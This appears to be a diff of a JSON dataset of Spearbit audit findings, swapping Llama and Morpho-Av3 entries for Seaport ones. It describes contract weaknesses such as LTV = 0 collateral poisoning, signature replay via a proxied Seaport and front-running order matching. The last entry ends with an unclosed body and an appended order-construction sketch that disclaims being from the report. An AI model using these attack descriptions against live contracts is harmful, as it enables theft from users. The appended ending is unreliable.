Solidity does the following when allocating memory: function allocate_memory(size) -> memPtr { memPtr := allocate_unbounded() finalize_allocation(memPtr, size) } function allocate_unbounded() -> memPtr { memPtr := mload(0x40) } function finalize_allocation(memPtr, size) { let newFreePtr := add(memPtr, round_up_to_mul_of_32(size)) // protect against overflow if or(gt(newFreePtr, 0xffffffff_ffffffff), lt(newFreePtr, memPtr)) { // <-- the check that is skipped panic_error_0x41() } mstore(0x40, newFreePtr) } function round_up_to_mul_of_32(value) -> result { result := and(add(value, 31), not(31)) } function panic_error_0x41() { // 0x4e487b71 = cast sig \"Panic(uint256)\" mstore(0, shl(224, 0x4e487b71)) mstore(4, 0x41) revert(0, 0x24) } Also note, rounding up the size to the nearest word boundary is hoisted out of malloc.", "labels": [ "Spearbit", - "Llama", + "Seaport", "Severity: Informational" ] }, { - "title": "GovernanceScript.revokeExpiredRoles should be avoided in favor of calling LlamaPol- icy.revokeExpiredRole from EOA", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", - "body": "GovernanceScript.revokeExpiredRoles is intended to be delagate called from LlamaCore. Given that LlamaPolicy.revokeExpiredRole is already public and without access controls, it will always be cheaper, and less complex, to call directly from an EOA or batching a multicall, again from an EOA.", + "title": "abi_decode_bytes can populate memory with dirty bytes", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "When abi_decode_bytes decodes bytes, it rounds its size and copies the rounded size from calldata to memory. This memory region might get populated with dirty bytes. So for example: For both signature and extraData we are using abi_decode_bytes. If the AdvancedOrder is tightly packed and: If signature's length is not a multiple of a word (0x20) part of the extraData.length bytes will be copied/duplicated to the end of signature's last memory slot. If extraData's length is not a multiple of a word (0x20) part of the calldata that comes after extraData's tail will be copied to memory. Even if AdvancedOrder is not tightly packed (tail offsets are multiple of a word relative to the head), the user can stuff the calldata with dirty bits when signature's or extraData's length is not a multiple of a word. And those dirty bits will be carried over to memory during decoding. Note, these extra bits will not be overridden or cleaned during the decoding because of the way we use and update the free memory pointer (incremented by the rounded-up number to a multiple of a word).", "labels": [ "Spearbit", - "Llama", + "Seaport", "Severity: Informational" ] }, { - "title": "The InvalidActionState can be improved", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", - "body": "Currently, the InvalidActionState includes the expected state as an argument, this is unnecessary as you can derive the state from the method call, would make more sense to take the current state instead of the expected state.", + "title": "abi_encode_validateOrder reuses a memory region", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "It is really important to note that before abi_encode_validateOrder is called, _prepareBasicFulfillmentFromCalldata(...) 
needs to be called to populate the memory region that is used for event OrderFulfilled(...) which can be reused/copied in this function: MemoryPointer.wrap(offerDataOffset).copy( dstHead.offset(tailOffset), offerAndConsiderationSize ); From when the memory region for OrderFulfilled(...) is populated till we reach this point, care needs to be taken not to modify that region. Accumulator data is written to the memory after that region and the current implementation does not touch that region during the whole call after the event has been emitted.", "labels": [ "Spearbit", - "Llama", + "Seaport", "Severity: Informational" ] }, { - "title": "_uncheckedIncrement function written in multiple contracts", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", - "body": "Multiple contracts make use of an _uncheckedIncrementfunction and each duplicates the function definition. Similarly the slot0 function appears in both LlamaAccount and LlamaCore and _toUint64 appears in the two strategy contracts plus LlamaCore.", + "title": "abi_encode_validateOrder writes to a memory region that might have been potentially dirtied by accumulator", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "In abi_encode_validateOrder potentially (in the future), we might be writing in an area where accumulator was used. And since the book-keeping for the accumulator does not update the free memory pointer, we need to make sure all bytes in the memory in the range [dst, dst+size) are fully updated/written to in this function.", "labels": [ "Spearbit", - "Llama", + "Seaport", "Severity: Informational" ] }, { - "title": "Side effects of LTV = 0 assets: Morpho's users will not be able to withdraw (collateral and \"pure\" supply), borrow and liquidate", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", - "body": "When an AToken has LTV = 0, Aave restricts the usage of some operations. In particular, if the user owns at least one AToken as collateral that has LTV = 0, operations could revert. 1) Withdraw: if the asset withdrawn is collateral, the user is borrowing something, the operation will revert if the withdrawn collateral is an AToken with LTV > 0. 2) Transfer: if the from is using the asset as collateral, is borrowing something and the asset transferred is an AToken with LTV > 0 the operation will revert. 3) Set the reserve of an AToken as not collateral: if the AToken you are trying to set as non-collateral is an AToken with LTV > 0 the operation will revert. Note that all those checks are done on top of the \"normal\" checks that would usually prevent an operation, de- pending on the operation itself (like, for example, an HF check). While a \"normal\" Aave user could simply withdraw, transfer or set that asset as non-collateral, Morpho, with the current implementation, cannot do it. Because of the impossibility to remove from the Morpho wallet the \"poisoned AToken\", part of the Morpho mechanics will break. 
Morpho's users could not be able to withdraw both collateral and \"pure\" supply Morpho's users could not be able to borrow Morpho's users could not be able to liquidate Morpho's users could not be able to claim rewards via claimRewards if one of those rewards is an AToken with LTV > 0", + "title": "Reorder writing to memory in ConsiderationEncoder to follow the order in struct definitions.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "Reorder the memory writes in ConsiderationEncoder to follow the order in struct definitions.", "labels": [ "Spearbit", - "Morpho-Av3", - "Severity: Critical Risk" + "Seaport", + "Severity: Informational" ] }, { - "title": "Morpho is vulnerable to attackers sending LTV = 0 collateral tokens, supply/supplyCollateral, bor- row and liquidate operations could stop working", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", - "body": "When an AToken has LTV = 0, Aave restricts the usage of some operations. In particular, if the user owns at least one AToken as collateral that has LTV = 0, these operations could revert 1) Withdraw: if the asset withdrawn is collateral, the user is borrowing something, the operation will revert if the withdrawn collateral is an AToken with LTV > 0 2) Transfer: if the from is using the asset as collateral, is borrowing something and the asset transferred is an AToken with LTV > 0 the operation will revert 3) Set the reserve of an AToken as not collateral: if the AToken you are trying to set as non-collateral is an AToken with LTV > 0 the operation will revert Note that all those checks are done on top of the \"normal\" checks that would usually prevent an operation, de- pending on the operation itself (like, for example, an HF check). In the attack scenario, the bad actor could simply supply an underlying that is associated with an LTV = 0 AToken and transfer it to the Morpho contract. If the victim does not own any balance of the asset, it will be set as collateral and the victim will suffer from all the side effects previously explained. While a \"normal\" Aave user could simply withdraw, transfer or set that asset as non-collateral, Morpho, with the current implementation, cannot do it. Because of the impossibility to remove from the Morpho wallet the \"poisoned AToken\", part of the Morpho mechanics will break. Morpho's users could not be able to withdraw both collateral and \"pure\" supply. 6 Morpho's users could not be able to borrow. Morpho's users could not be able to liquidate. 
Morpho's users could not be able to claim rewards via claimRewards if one of those rewards is an AToken with LTV > 0.", + "title": "The compiled YUL code includes redundant consecutive validation of enum types", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "In half of the locations where an enum type struct field has been used/accessed, the validation function for this enum type is performed twice: validator_assert_enum_(memPtr) validator_assert_enum_(memPtr)", "labels": [ "Spearbit", - "Morpho-Av3", - "Severity: Critical Risk" + "Seaport", + "Severity: Informational" ] }, { - "title": "Morpho is not correctly handling the asset price in _getAssetPrice when isInEMode == true but priceSource is addres(0)", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", - "body": "The current implementation of _getAssetPrice returns the asset's price based on the value of isInEMode function _getAssetPrice(address underlying, IAaveOracle oracle, bool isInEMode, address priceSource) internal view returns (uint256) if (isInEMode) { uint256 eModePrice = oracle.getAssetPrice(priceSource); if (eModePrice != 0) return eModePrice; } return oracle.getAssetPrice(underlying); { } As you can see from the code, if isInEMode is equal to true they call oracle.getAssetPrice no matter what the value of priceSource that could be address(0). 7 If we look inside the AaveOracle implementation, we could assume that in the case where asset is address(0) (in this case, Morpho pass priceSource _getAssetPrice parameter) it would probably return _fallbackOra- cle.getAssetPrice(asset). In any case, the Morpho logic diverges compared to what Aave implements. On Aave, if the user is not in e-mode, the e-mode oracle is address(0) or the asset's e-mode is not equal to the user's e-mode (in case the user is in e-mode), Aave always uses the asset price of the underlying and not the one in the e-mode priceSource. The impact is that if no explicit eMode oracle has been set, Morpho might revert in price computations, breaking liquidations, collateral withdrawals, and borrows if the fallback oracle does not support the asset, or it will return the fallback oracle's price which is different from the price that Aave would use.", + "title": "Consider writing tests for revert functions in ConsiderationErrors", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "ConsiderationErrors.sol is a new file and is untested. Writing test cases to make sure the revert functions are throwing the right errors is an easy way to prevent mistakes.", "labels": [ "Spearbit", - "Morpho-Av3", - "Severity: Critical Risk" + "Seaport", + "Severity: Informational" ] }, { - "title": "Isolated assets are treated as collateral in Morpho", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", - "body": "Aave-v3 introduced isolation assets and isolation mode for users: \"Borrowers supplying an isolated asset as collateral cannot supply other assets as collateral (though they can still supply to capture yield). Only stablecoins that have been permitted by Aave governance to be borrowable in isolation the mode can be borrowed by users utilizing isolated collateral up to a specified debt ceiling.\" The Morpho contract is intended not to be in isolation mode to avoid its restrictions. 
Supplying an isolated asset to Aave while there are already other (non-isolated) assets set as collateral will simply supply the asset to earn yield without setting it as collateral. However, Morpho will still set these isolated assets as collateral for the supplying user. Morpho users can borrow any asset against them which should not be possible: Isolated assets are by definition riskier when used as collateral and should only allow borrowing up to a specific debt ceiling. The borrows are not backed on Aave as the isolated asset is not treated as collateral there, lowering the Morpho Aave position's health factor and putting the system at risk of liquidation on Aave.", + "title": "Typo in comment for the selector used in ConsiderationEncoder.sol#abi_encode_validateOrder()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "Minor typo in comments: // Write ratifyOrder selector and get pointer to start of calldata dst.write(validateOrder_selector);", "labels": [ "Spearbit", - "Morpho-Av3", - "Severity: Critical Risk" + "Seaport", + "Severity: Informational" ] }, { - "title": "Morpho's logic to handle LTV = 0 AToken diverges from the Aave logic and could decrease the user's HF/borrowing power compared to what the same user would have on Aave", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", - "body": "The current implementation of Morpho has a specific logic to handle the scenario where Aave sets the asset's LTV to zero. We can see how Morpho is handling it in the _assetLiquidityData function function _assetLiquidityData(address underlying, Types.LiquidityVars memory vars) internal view returns (uint256 underlyingPrice, uint256 ltv, uint256 liquidationThreshold, uint256 tokenUnit) { ,! } // other function code... // If the LTV is 0 on Aave V3, the asset cannot be used as collateral to borrow upon a breaking withdraw. // In response, Morpho disables the asset as collateral and sets its liquidation threshold // to 0 and the governance should warn users to repay their debt. if (config.getLtv() == 0) return (underlyingPrice, 0, 0, tokenUnit); // other function code... The _assetLiquidityData function is used to calculate the number of assets a user can borrow and the maximum debt a user can reach before being liquidated. Those values are then used to calculate the user Health Factor. The Health Factor is used to Calculate both if a user can be liquidated and in which percentage the collateral can be seized. Calculate if a user can withdraw part of his/her collateral. The debt and borrowable amount are used in the Borrowing operations to know if a user is allowed to borrow the specified amount of tokens. On Aave, this situation is handled differently. First, there's a specific distinction when the liquidation threshold is equal to zero and when the Loan to Value of the asset is equal to zero. Note that Aave enforces (on the configuration setter of a reserve) that ltv must be <= of liquidationThreshold, this implies that if the LT is zero, the LTV must be zero. In the first case (liquidation threshold equal to zero) the collateral is not counted as collateral. This is the same behavior followed by Morpho, but the difference is that Morpho also follows it when the Liquidation Threshold is greater than zero. 
In the second case (LT > 0, LTV = 0) Aave still counts the collateral as part of the user's total collateral but does not increase the user's borrowing power (it does not increase the average LTV of the user). This influences the user's health factor (and so all the operations based on it) but not as impactfully as Morpho is doing. In conclusion, when the LTV of an asset is equal to zero, Morpho is not applying the same logic as Aave is doing, removing the collateral from the user's collateral and increasing the possibility (based on the user's health factor, user's debt, user's total collateral and all the asset's configurations on Aave) to Deny a user's collateral withdrawal (while an Aave user could have done it). Deny a user's borrow (while an Aave user could have done it). Make a user liquidable (while an Aave user could have been healthy). Increasing the possibility to allow the liquidator to seize the full collateral of the borrower (instead of 50%). 9", "labels": [ "Spearbit", - "Morpho-Av3", - "Severity: High Risk MorphoInternal.sol#L324," + "Seaport", + "Severity: Informational" ] }, { - "title": "RewardsManager does not take in account users that have supplied collateral directly to the pool", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", - "body": "Inside RewardsManager._getUserAssetBalances Morpho is calculating the amount of the supplied and borrowed balance for a specific user. In the current implementation, Morpho is ignoring the amount that the user has supplied as collateral directly into the Aave pool. As a consequence, the user will be eligible for fewer rewards or even zero in the case where he/she has supplied only collateral.", + "title": "_contractNonces[offerer] gets incremented even if the generateOrder(...)'s return data does not satisfy all the constraints.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "_contractNonces[offerer] gets incremented even if the generateOrder(...)'s return data does not satisfy all the constraints. This is the case when errorBuffer != 0 and revertOnInvalid == false (fulfillAvailableOrders, fulfillAvailableAdvancedOrders). In this case, Seaport would not call back into the contract offerer's ratifyOrder(...) endpoint. Thus, the next time this offerer receives a ratifyOrder(...) call from Seaport, the nonce shared with it might have been incremented by more than 1.", "labels": [ "Spearbit", - "Morpho-Av3", - "Severity: High Risk" + "Seaport", + "Severity: Informational" ] }, { + "title": "Users need to be cautious about what proxied/modified Seaport or Conduit instances they approve their tokens to", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "Seaport (S) uses the EIP-712 domain separator to make sure that when users sign orders, the signed orders only apply to that specific Seaport by pinpointing its name, version, the chainid, and its address. The domain separator is calculated and cached once the Seaport contract gets deployed. The domain separator only gets recalculated when/if the chainid changes (in the case of a hard fork for example). Some actors can take advantage of this caching mechanism by deploying a contract (S') that: Delegates some of its endpoints to Seaport or is just a proxy contract. Its codebase is almost identical to Seaport except that the domain separator actually replicates what the original Seaport is using. 
This only requires 1 or 2 lines of code change (in this case the caching mechanism is not important) function _deriveDomainSeparator() { ... // Place the address of this contract in the next memory location. mstore(FourWords, MAIN_SEAPORT_ADDRESS) // <--- modified line; perhaps the actor can define a named constant Assume a user approves either: 1. Both the original Seaport instance and the modified/proxied instance or, 2. A conduit that has open channels to both the original Seaport instance and the modified/proxied instance. And signs an order for the original Seaport that in the 1st case doesn't use any conduits or in the 2nd case the order uses the approved conduit with 2 open channels. Then one can use the same signature once with the original Seaport and once with the modified/proxied one to receive more tokens than the offerer / user originally intended to sell.", "labels": [ "Spearbit", - "Morpho-Av3", - "Severity: High Risk" + "Seaport", + "Severity: Informational" ] }, { - "title": "Accounting issue when repaying P2P fees while having a borrow delta", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", - "body": "When repaying debt on Morpho, any potential borrow delta is matched first. Repaying the delta should involve both decreasing the scaledDelta as well as decreasing the scaledP2PAmount by the matched amount. [1] However, the scaledP2PAmount update is delayed until the end of the repay function. The following repayFee call then reads the un-updated market.deltas.borrow.scaledP2PAmount storage variable leading to a larger estimation of the P2P fees that can be repaid. The excess fee that is repaid will stay in the contract and not be accounted for, when it should have been used to promote borrowers, increase idle supply or demote suppliers. For example, there could now be P2P suppliers that should have been demoted but are not and in reality don't have any P2P counterparty, leaving the entire accounting system in a broken state. Example (all values are in underlying amounts for brevity.) Imagine a borrow delta of 1000, borrow.scaledP2PTotal = 10,000 supply.scaledP2PTotal = 8,000, so the repayable fee should be (10,000 - 1000) - (8,000 - 0) = 1,000. Now a P2P borrower wants to repay 3000 debt: 1. Pool repay: no pool repay as they have no pool borrow balance. 2. Decrease p2p borrow delta: decreaseDelta is called which sets market.deltas.borrow.scaledDelta = 0 (but does not update market.deltas.borrow.scaledP2PAmount yet!) and returns matchedBorrowDelta = 1000 3. repayFee is called and it computes (10,000 - 0) - (8,000 - 1,000) = 2,000. They repay more than the actual fee.", + "title": "ZoneInteraction contains logic for both zone and contract offerers", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "ZoneInteraction contains logic for both zone and contract offerers.", "labels": [ "Spearbit", - "Morpho-Av3", - "Severity: High Risk" + "Seaport", + "Severity: Informational" ] }, { - "title": "Repaying with ETH does not refund excess", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", - "body": "Users can repay WETH Morpho positions with ETH using the WETHGateway. The specified repay amount will be wrapped to WETH before calling the Morpho function to repay the WETH debt. 
However, the Morpho repay function only pulls in Math.min(_getUserBorrowBalanceFromIndexes(underlying, onBehalf, indexes), amount). If the user specified an amount larger than their debt balance, the excess will be stuck in the WETHGateway contract. This might be especially confusing for users because the standard Morpho.repay function does not have this issue and they might be used to specifying a large, round value to be sure to repay all principal and accrued debt once the transaction is mined.", + "title": "Orders of CONTRACT order type can lower the value of a token offered", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "Sometimes tokens have extra value because of the derived tokens owned by them (for example an accessory for a player in a game). With the introduction of contract offerers, one can create a contract offerer that automatically lowers the value of a token, for example, by transferring the derived connected token to a different item when Seaport calls the generateOrder(...). When such an order is included in a collection of orders, the only way to ensure that the recipient of the item will hold a token whose value hasn't depreciated during the transaction is for the recipient to also use a kind of mirrored order that incorporates either a CONTRACT or restricted order type that can do a post-transfer check.", "labels": [ "Spearbit", - "Morpho-Av3", - "Severity: High Risk" + "Seaport", + "Severity: Informational" ] }, { - "title": "Morpho can end up in isolation mode", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", - "body": "Aave-v3 introduced isolation assets and isolation mode for users: \"Borrowers supplying an isolated asset as collateral cannot supply other assets as collateral (though they can still supply to capture yield). Only stablecoins that have been permitted by Aave governance to be borrowable in isolation the mode can be borrowed by users utilizing isolated collateral up to a specified debt ceiling.\" The Morpho contract has a single Aave position for all its users and does therefore not want to end up in isolation mode due to its restrictions. The Morpho code would still treat the supplied non-isolation assets as collateral for their Morpho users, allowing them to borrow against them, but the Aave position does not treat them as collateral anymore. Furthermore, Morpho can only borrow stablecoins up to a certain debt ceiling. Morpho can be brought into isolation mode: Up to deployment, an attacker maliciously sends an isolated asset to the address of the proxy. Aave sets assets as collateral when transferred, such that the Morpho contract already starts out in isolation mode. This can even happen before deployment by precomputing addresses or simply frontrunning the deployment. This attack also works if Morpho does not intend to create a market for the isolated asset. Upon deployment and market creation: An attacker or unknowing user is the first to supply an asset and this asset is an isolated asset, Morpho's Aave position automatically enters isolation mode. At any time if an isolated asset is the only collateral asset. 
This can happen when collateral assets are turned off on Aave, for example, by withdrawing (or liquidating) the entire balance.", + "title": "Restricted order checks in case where offerer and the fulfiller are the same", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "Seaport 1.2 disallowed skipping restricted order checks when offerer and fulfiller are the same. Remove special-casing for offerer-fulfilled restricted orders: Offerers may currently bypass restricted order checks when fulfilling their own orders. This complicates reasoning about restricted order validation, can aid in the deception of other offerers or fulfillers in some unusual edge cases, and serves little practical use. However, in the case of the offerer == fulfiller == zone, the check continues to be skipped.", "labels": [ "Spearbit", - "Morpho-Av3", - "Severity: High Risk" + "Seaport", + "Severity: Informational" ] }, { - "title": "Collateral setters for Morpho / Aave can end up in a deadlock", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", - "body": "One can end up in a deadlock where changing the Aave pool or Morpho collateral state is not possible anymore because it can happen that Aave automatically turns the collateral asset off (for example, when withdrawing everything / getting liquidated). Imagine a collateral asset is turned on for both protocols: setAssetIsCollateralOnPool(true) setAssetIsCollateral(true) Then, a user withdraws everything on Morpho / Aave, and Aave automatically turns it off. It's off on Aave but on on Morpho. It can't be turned on for Aave anymore because: if (market.isCollateral) revert Errors.AssetIsCollateralOnMorpho(); But it also can't be turned off on Morpho anymore because of: if (!_pool.getUserConfiguration(address(this)).isUsingAsCollateral(_pool.getReserveData(underlying).id) ) { revert Errors.AssetNotCollateralOnPool(); ,! ,! } c This will be bad if new users deposit after having withdrawn the entire asset. The asset is collateral on Morpho but not on Aave, breaking an important invariant that could lead to liquidating the Morpho Aave position.", + "title": "Clean up inline documentation", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "The comments highlighted in Context need to be removed or updated. Remove the following: ConsiderationEncoder.sol:216: // @todo Dedupe some of this ConsiderationEncoder.sol:316: // @todo Dedupe some of this ZoneInteraction.sol:97: // bytes memory callData; ZoneInteraction.sol:100: // function(bytes32) internal view errorHandler; ZoneInteraction.sol:182: // let magicValue := shr(224, mload(callData)) ConsiderationStructs.sol#L167 and ZoneInteraction.sol#L82 contain an outdated comment about the extraData attribute. There is no longer a staticcall being done, and the function isValidOrderIncludingExtraData no longer exists. The NatSpec comment for _assertRestrictedAdvancedOrderValidity mentions: /** * @dev Internal view function to determine whether an order is a restricted order and, if so, to ensure that it was either submitted by the offerer or the zone for the order, or that the zone returns the expected magic value upon performing a staticcall to `isValidOrder` or `isValidOrderIncludingExtraData` depending on whether the order fulfillment specifies extra data or criteria resolvers. 
A few of the facts are not correct anymore: * This function is not a view function anymore and can change the storage state of either a zone or a contract offerer. * It is not only for restricted orders but also applies to orders of CONTRACT order type. * It performs actual calls and not staticcalls anymore. * It calls the isValidOrder endpoint of a zone or the ratifyOrder endpoint of a contract offerer depending on the order type. * If it is dealing with a restricted order, the check is only skipped if the msg.sender is the zone. If Seaport is called by the offerer for a restricted order, the call to the zone is still performed. The same comments apply to _assertRestrictedBasicOrderValidity, excluding the case when the order is of CONTRACT order type. Typos in TransferHelperErrors.sol - * @dev Revert with an error when a call to a ERC721 receiver reverts with + * @dev Revert with an error when a call to an ERC721 receiver reverts with The @ NatSpec fields have an extra space in Consideration.sol: * @ The extra space can be removed.", "labels": [ "Spearbit", - "Morpho-Av3", - "Severity: Medium Risk" + "Seaport", + "Severity: Informational" ] }, { - "title": "First reward claim is zero for newly listed reward tokens", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", - "body": "When Aave adds a new reward token for an asset, the reward index for this (asset, reward) pair starts at 0. When an update in Morpho's reward manager occurs, it initializes all rewards for the asset and would initialize this new reward token with a startingIndex of 0. 1. Time passes and emissions accumulate to all pool users, resulting in a new index assetIndex. Users who deposited on the pool through Morpho before this reward token was listed should receive their fair share of the entire emission rewards (assetIndex - 0) * oldBalance but they currently receive zero because getRewards returns early if the user's computed index is 0. 2. Also note that the external getUserAssetIndex(address user, address asset, address reward) can be inaccurate because it doesn't simulate setting the startingIndex for reward tokens that haven't been set yet. 3. A smaller issue that can happen when new reward tokens are added is that updates to the startingIndex are late, the startingIndex isn't initialized to 0 but to some asset index that accrued emissions for some time. Morpho on-pool users would lose some rewards until the first update to the asset. (They should accrue from index 0 but accrue from startingIndex.) Given frequent calls to the RewardManager that initializes all rewards for an asset, this difference should be negligible.", + "title": "Consider writing tests for hard coded constants in ConsiderationConstants.sol", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "There are many hard coded constants, most being function selectors, that should be tested against.", "labels": [ "Spearbit", - "Morpho-Av3", - "Severity: Medium Risk" + "Seaport", + "Severity: Informational" ] }, { - "title": "Disable creating markets for siloed assets", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", - "body": "Aave-v3 introduced siloed-borrow assets and siloed-borrow mode for users \"This feature allow assets with potentially manipulatable oracles (for example illiquid Uni V3 pairs) to be listed on Aave as single borrow asset i.e. 
if user borrows siloed asset, they cannot borrow any other asset. This helps mitigating the risk associated with such assets from impacting the overall solvency of the protocol.\" - Aave Docs The Morpho contract should not be in siloed-borrowing mode to avoid its restrictions on borrowing any other listed assets, especially as borrowing on the pool might be required for withdrawals. If a market for the siloed asset is created at deployment, users might borrow the siloed asset and break borrowing any of the other assets.", + "title": "Unused / Redundant imports in ZoneInteraction.sol", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "There are multiple unused / redundant imports.", "labels": [ "Spearbit", - "Morpho-Av3", - "Severity: Medium Risk" + "Seaport", + "Severity: Informational" ] }, { - "title": "A high value of _defaultIterations could make the withdrawal and repay operations revert because of OOG", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", - "body": "When the user executes some actions, he/she can specify their own maxIterations parameter. The user maxIterations parameter is directly used in supplyLogic and borrowLogic. In the withdrawLogic Morpho is recalculating the maxIterations to be used internally as Math.max(_default- Iterations.withdraw, maxIterations) and in repayLogic is directly using _defaultIterations.repay as the max number of iterations. This parameter is used as the maximum number of iterations that the matching engine can do to match suppli- ers/borrowers during promotion/demotion operations. 15 function _promoteOrDemote( LogarithmicBuckets.Buckets storage poolBuckets, LogarithmicBuckets.Buckets storage p2pBuckets, Types.MatchingEngineVars memory vars ) internal returns (uint256 processed, uint256 iterationsDone) { if (vars.maxIterations == 0) return (0, 0); uint256 remaining = vars.amount; // matching engine code... for (; iterationsDone < vars.maxIterations && remaining != 0; ++iterationsDone) { // matching engine code (onPool, inP2P, remaining) = vars.step(...); // matching engine code... } // matching engine code... } As you can see, the iteration keeps going on until the matching engine has matched enough balance or the iterations have reached the maximum number of iterations. If the matching engine cannot match enough balance, it could revert because of OOG if vars.maxIterations is a high value. For the supply or borrow operations, the user is responsible for the specified number of iterations that might be done during the matching process, in that case, if the operations revert because of OGG, it's not an issue per se. The problem arises for withdraw and replay operations where Morpho is forcing the number of operations and could make all those transactions always revert in case the matching engine does not match enough balance in time. 
Keep in mind that even if the transaction does not revert during the _promoteOrDemote logic, it could revert during the following operations just because the _promoteOrDemote has consumed enough gas to make the following operations to use the remaining gas.", + "title": "Orders of CONTRACT order type do not enforce a usage of a specific conduit", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "None of the endpoints (generateOrder and ratifyOrder) for an order of CONTRACT order type enforce using a specific conduit. A contract offerer can enforce the usage of a specific conduit or just Seaport by setting allowances or approval for specific tokens. If a caller calls into different Seaport endpoints and does not provide the correct conduit key, then the order would revert. Currently, the ContractOffererInterface interface does not have a specific endpoint to discover which conduits the contract offerer would prefer users to use. getMetadata() would be able to return metadata that encodes the conduit key. For (advanced) orders of non-CONTRACT order types, the offerer would sign the order and the conduit key is included in the signed hash. Thus, the conduit is enforced whenever that order gets included in a collection by an actor calling Seaport.", "labels": [ "Spearbit", - "Morpho-Av3", - "Severity: Medium Risk" + "Seaport", + "Severity: Informational" ] }, { - "title": "Morpho should check that the _positionsManager used has the same _E_MODE_CATEGORY_ID and _- ADDRESSES_PROVIDER values used by the Morpho contract itself", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", - "body": "Because _E_MODE_CATEGORY_ID and _ADDRESSES_PROVIDER are immutable variables and because Morpho is calling the PositionsManager in a delegatecall context, it's fundamental that both Morpho and Posi- tionsManager have been initialized with the same _E_MODE_CATEGORY_ID and _ADDRESSES_PROVIDER values. Morpho should also check the value of the PositionsManager._E_MODE_CATEGORY_ID and PositionsManager._- ADDRESSES_PROVIDER in both the setPositionsManager and initialize function.", + "title": "Calls to Seaport that would fulfill or match a collection of advanced orders can be front-run to claim any unused offer items", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "Calls to Seaport that would fulfill or match a collection of advanced orders can be front-run to claim any unused offer items. These endpoints include: fulfillAvailableOrders fulfillAvailableAdvancedOrders matchOrders matchAdvancedOrders Anyone can monitor the mempool to find calls to the above endpoints and calculate if there are any unused offer item amounts. If there are unused offer item amounts, the actor can create orders with no offer items, but with consideration items mirroring the unused offer items and populate the fulfillment aggregation data to match the unused offer items with the new mirrored consideration items. It is possible that the call by the actor would be successful under certain conditions. For example, if there are orders of CONTRACT order type involved, the contract offerer might reject this actor (the rejection might also happen by the zones used when validating the order). 
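As an illustrative sketch (hypothetical field values on our part, not from the report), the front-runner's mirrored order can simply offer nothing and demand the leftovers: OrderParameters({ offerer: frontRunner, offer: new OfferItem[](0), consideration: itemsMirroringTheUnusedOfferAmounts, orderType: OrderType.FULL_OPEN, ... }), paired via the fulfillment components with the unused offer items of the victim orders.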
